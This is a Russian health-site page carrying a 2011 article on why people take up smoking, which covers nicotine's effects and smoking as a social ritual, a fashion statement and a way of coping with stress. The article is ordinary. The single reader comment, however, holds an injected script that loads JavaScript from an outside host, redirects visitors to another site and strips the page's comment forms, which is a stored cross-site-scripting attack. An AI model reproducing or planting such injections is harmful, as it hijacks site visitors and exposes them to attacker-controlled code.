Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Никотиновое рабство – как...  >>  Никотиновое рабство – как в него попадают
 
Обратная связь
 

Никотиновое рабство – как в него попадают

Размер шрифта
04 мая 2011 00:00
  • google_analytics: false
  • Нравится

Знаете ли вы, что в России от табака ежегодно умирают 400 тысяч человек? По всему миру 5 миллионов человек в год становятся жертвами этой гадкой привычки. Впечатляет, не правда ли? И тем не менее миллионы людей по всему миру все равно продолжают курить. Вопрос: зачем?

курение

Егор Кошелев / «Здоровье-инфо»

По данным Всемирной Организации Здравоохранения почти 1,3 миллиарда населения планеты страдают от никотиновой зависимости. Курение признано одной из самых тяжелых форм наркотической зависимости. Сложно представить, что такое количество людей добровольно обрекают себя на медленную и мучительную смерть от курения. Но статистика неумолима. Так что же толкает здравомыслящего человека на смертельно опасный путь курильщика?

1. Воздействие никотина

Присказка про «каплю никотина» известна всем. Пока нет четкого ответа на вопрос, как именно воздействует никотин на головной мозг человека. По своей химической природе никотин является сильным стимулирующим средством, которое усиливает работу мозга и вызывает легкую эйфорию. Никотин попадает в организм с дымом, затем через легкие выходит в кровь, а оттуда – прямиком в центральную нервную систему. Заядлые курильщики уверены, что привычка улучшает их мыслительный процесс. Действительно, при курении выделяются допамин и адреналин, сердцебиение ускоряется, и курильщику кажется, что ему и правда лучше работается с сигаретой в руке. Однако длительное курение может стать причиной таких заболеваний, как атеросклероз, артериальная гипертония, аритмия, тахикардия, стенокардия, ишемическая болезнь сердца, инфаркт миокарда и импотенция. На вершине списка – рак легких.

2. Курение как ритуал

Подростки таким способом демонстрируют свою свободу и независимость. Некоторые так решают проблему общения. Если вдруг вам задали непростой вопрос, вы всегда можете взять сигарету, выдержать театральную паузу. Офисные работники – те же подростки. И на вопрос о том, что их побуждает курить, наверняка ответят – «в курилке можно спокойно обсудить наиболее важные вопросы». Только вот не стоит забывать, что о делах насущных вашей компании можно спокойно побеседовать и без сигареты! Например, за чашкой зеленого чая.

бросить курить

3. Сигарета как модный аксессуар

Многие девушки до сих пор уверены, что курить – модно. Тем самым они хотят подчеркнуть самостоятельность и полное равноправие с мужчинами. Многим кажется, что курящей девушке легче познакомиться с молодым человеком: стоит достать сигарету, и он тут же предложит огонек. А там, слово за слово… Но что делать, если он не курит? Ничего не поделаешь – придется бросать. К тому же, некурящих молодых людей сейчас все больше. И им совсем не нравятся барышни с сигаретами в зубах. Не стоит забывать и о том, что увлечения приходит и уходит, а вред от курения остается.

4. Сигарета как ключ к решению проблемы

Самая распространенная причина, по которой человек тянется к пачке сигарет – желание уйти от проблем, избавиться от стресса, успокоиться, снять эмоциональное напряжение. По их мнению, курение является хорошим средством снизить эмоциональную нагрузку. Это очевидное заблуждение крайне коварно! Курение не снимает напряжение, а наоборот – медленно, но верно уничтожает нервную систему. Нарастающий никотиновый голод мешает нормально думать, и пока его не удовлетворишь, расслабления не будет. Вы курите все больше и больше. Что же это за выбор такой: лучше смерть от рака легких, чем небольшое душевное волнение, о котором вы забудете через пару дней? Миллиарды людей в мире расслабляются без курения и счастливы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Топ-10 мифов о курении   Тяжелые последствия «легких» сигарет   Курение бьет по костям   Как отучить мужчину от курения?  
31 мая 2011Сегодня - Всемирный день отказа от курения 06 мая 2011Сигареты в Австралии станут «пугающими»
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 05 июля 2011Никотин только по рецепту
 

Слайдшоу

1
Какие привычки портят вам жизнь?
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.